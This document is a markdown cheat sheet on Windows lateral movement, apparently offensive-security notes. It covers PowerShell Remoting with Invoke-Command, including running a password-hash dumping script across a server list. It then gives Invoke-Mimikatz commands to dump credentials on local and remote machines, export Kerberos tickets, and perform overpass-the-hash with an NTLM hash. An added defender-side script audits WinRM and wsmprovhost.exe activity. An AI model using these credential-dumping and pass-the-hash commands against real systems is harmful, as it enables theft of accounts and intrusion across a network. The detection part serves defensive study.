
# Lateral Movement

***

## PowerShell Remoting

* Enabled by default on Windows Server 2012 onwards.
* On desktop Windows machines you may need to enable it with `Enable-PSRemoting` (requires admin privileges).
* You get an elevated shell on the remote system if admin credentials are used to authenticate (default setting).

## One-to-One

### PSSession

* Interactive
* Runs in a new process (`wsmprovhost.exe`)
* Is stateful.

### Useful cmdlets

```powershell
New-PSSession
Enter-PSSession
```

## One-to-many

* Also known as Fan-Out Remoting
* Non-interactive
* Executes commands in parallel
* Runs commands and scripts on
  * Multiple computers
  * In disconnected sessions (PowerShell v3+)
  * As background jobs, and more

### Useful cmdlets

```powershell
Invoke-Command -ComputerName <ComputerName>
Invoke-Command -ComputerName (Get-Content <List-of-servers>)
Invoke-Command -ComputerName <ComputerName> -Credential <Creds>   # To pass a username/password
```

#### Usage Example

```powershell
# To execute a command remotely
Invoke-Command -ScriptBlock {whoami; Get-Process} -ComputerName <value> -Credential <Creds>

# To execute a script remotely
Invoke-Command -FilePath C:\Path\Get-PassHashes.ps1 -ComputerName (Get-Content <List-of-servers>)

# Whenever you get an error when executing commands/scripts on a remote machine, check the
# language mode: in ConstrainedLanguage mode you can't execute anything but built-in cmdlets
Invoke-Command -ScriptBlock {$ExecutionContext.SessionState.LanguageMode} -ComputerName <value> -Credential <Creds>
```
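A defender-side check for the artifacts this section describes (the WinRM event written for each remote shell, and the child processes of `wsmprovhost.exe` that a PSSession or `Invoke-Command` spawns), added here as an example and not part of the original notes. It assumes an elevated PowerShell on the host being audited, process-creation auditing (Security Event ID 4688 with parent-process data) enabled, and `$Since` is a parameter introduced here for the look-back window:

```powershell
# Added example (not part of the original notes): audit inbound PowerShell Remoting
# on a host using the two artifacts the notes describe:
# WinRM logs every remote shell it creates (Event ID 91), and anything run
# through a PSSession / Invoke-Command is spawned by wsmprovhost.exe.
# Assumptions: run elevated on the host being checked; process-creation auditing
# (Security 4688, with parent process data) is enabled; $Since is the look-back.
param([datetime]$Since = (Get-Date).AddHours(-24))

# 1. Remote shells created on this host (Microsoft-Windows-WinRM/Operational, ID 91).
$shells = Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-WinRM/Operational'; Id = 91; StartTime = $Since
} -ErrorAction SilentlyContinue | ForEach-Object {
    $ev  = $_
    $sid = $ev.UserId          # SID of the authenticated remote user
    $user = $sid.Value
    try { $user = $sid.Translate([System.Security.Principal.NTAccount]).Value } catch {}
    $uri = if ($ev.Message -match 'ResourceUri:\s*(\S+)') { $Matches[1] } else { '' }
    [pscustomobject]@{
        Time        = $ev.TimeCreated
        User        = $user
        ResourceUri = $uri    # .../powershell/Microsoft.PowerShell means a PS remoting session
    }
}

# 2. Processes whose parent is wsmprovhost.exe (Security log, Event ID 4688).
$children = Get-WinEvent -FilterHashtable @{
    LogName = 'Security'; Id = 4688; StartTime = $Since
} -ErrorAction SilentlyContinue | ForEach-Object {
    $ev = $_
    $d  = @{}
    ([xml]$ev.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
    if ($d['ParentProcessName'] -like '*\wsmprovhost.exe') {
        [pscustomobject]@{
            Time    = $ev.TimeCreated
            Subject = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
            Process = $d['NewProcessName']
            Command = $d['CommandLine']   # empty unless command-line auditing is enabled
        }
    }
}

"Remote PowerShell shells created since $Since : $(@($shells).Count)"
$shells   | Sort-Object Time | Format-Table -AutoSize
"Processes spawned from PSSessions (parent wsmprovhost.exe): $(@($children).Count)"
$children | Sort-Object Time | Format-Table -AutoSize
```

Legitimate administration also shows up here, so the useful signal is a remote shell or a `wsmprovhost.exe` child from an account, source or time that does not match expected admin activity.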

***

## Mimikatz

* This script is used to dump credentials, tickets and more.
* Running Mimikatz through PowerShell (`Invoke-Mimikatz`) works without dropping `mimikatz.exe` to disk.
* It is useful for passing and relaying hashes and tickets, and for many Active Directory attacks.
* The script needs admin privileges to dump credentials from the local machine.

### Usage

```powershell
# PowerSploit module
# Dump credentials on the local machine (default)
Invoke-Mimikatz -DumpCreds

# Dump creds on multiple remote machines
Invoke-Mimikatz -DumpCreds -ComputerName @("system1","system2")

# The commands above use the PowerShell cmdlet "Invoke-Command" to do their job.
```

### Export all Kerberos tickets to disk

```powershell
# PowerSploit module
Invoke-Mimikatz -Command '"kerberos::list /export"'
```

### "Over pass the hash": generate tokens from hashes

```powershell
# PowerSploit module
Invoke-Mimikatz -Command '"sekurlsa::pth /user:administrator /domain:<DOMAIN> /ntlm:<NTLM> /run:powershell.exe"'
```

